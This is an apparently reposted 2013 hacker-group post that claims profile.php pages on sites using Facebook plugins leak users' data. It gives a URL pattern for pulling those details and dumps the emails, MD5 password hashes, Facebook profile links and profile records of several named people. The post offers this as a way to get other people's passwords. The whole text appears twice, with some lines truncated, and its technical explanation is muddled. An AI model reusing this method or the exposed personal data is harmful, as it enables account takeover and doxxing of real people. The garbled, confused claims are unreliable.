#############################################################
# Title: ExploitFacebook Via External Plugins and Modules
# Exploitation: Manually (use your brain ^_^)
# Date: 28/03/2013
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################
For Example my victim is =======>>> https://www.facebook.com/gaturro22
How i could be able to retrieve his password ? easy
Proof of Concept :Facebook Id ====>>> gaturro22
P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
So asyou can see we got the email & the password :
Email: gonza.la22@gmail.com
Password: e10adc3949ba59abbe56e057f20f883e
Another Demo : http://www.salondaddy.com/profile.php?ID=85
So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie .forever
It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are
backdoored with a javascript malware that can sniff all your informations
So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites
especially applications , sothe facebook user must allow permission to access to the application and most of the plugins are infected !_!
So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users no doubt , just use your brain !
Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top
Check this : [NickName] => orso44 ===========>>> add this to www.facebook.com
http://www.facebook.com/orso44 ============>>> Facebook Profile
[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5
Another Victim : ==========>>> https://www.facebook.com/kornberg
Infos Retrieved :
[_iProfileID] => 7893
[_aProfile] => Array
(
[datafile] => 1
[ID] => 7893
[NickName] => Kornberg
[Email] => anselmpennell435@yahoo.com
[Password] => 087fbfdeb33dae28260cfdb8f2d8a787
[Status] => Active
{
"id": "862420463",
"name": "Zoe Kornberg",
"first_name": "Zoe",
"last_name": "Kornberg",
"username": "kornberg",
"gender": "female",
"locale": "en_US"
}
Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand
I just selected this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!
# Title: Exploit
# Exploitation: Manually (
# Date: 28/03/2013
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################
For Example my victim is =======>>> https://www.facebook.com/gaturro22
How i could be able to retrieve his password ? easy
Proof of Concept :
P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
So as
Email: gonza.la22@gmail.com
Password: e10adc3949ba59abbe56e057f20f883e
Another Demo : http://www.salondaddy.com/profile.php?ID=85
So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=
It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are
backdoored with a javascript malware that can sniff all your informations
So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites
especially applications , so
So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users no doubt , just use your brain !
Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top
Check this : [NickName] => orso44 ===========>>> add this to www.facebook.com
http://www.facebook.com/orso44 ============>>> Facebook Profile
[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5
Another Victim : ==========>>> https://www.facebook.com/kornberg
Infos Retrieved :
[_iProfileID] => 7893
[_aProfile] => Array
(
[datafile] => 1
[ID] => 7893
[NickName] => Kornberg
[Email] => anselmpennell435@yahoo.com
[Password] => 087fbfdeb33dae28260cfdb8f2d8a787
[Status] => Active
{
"id": "862420463",
"name": "Zoe Kornberg",
"first_name": "Zoe",
"last_name": "Kornberg",
"username": "kornberg",
"gender": "female",
"locale": "en_US"
}
Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand
I just selected this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!
0 comments:
Post a Comment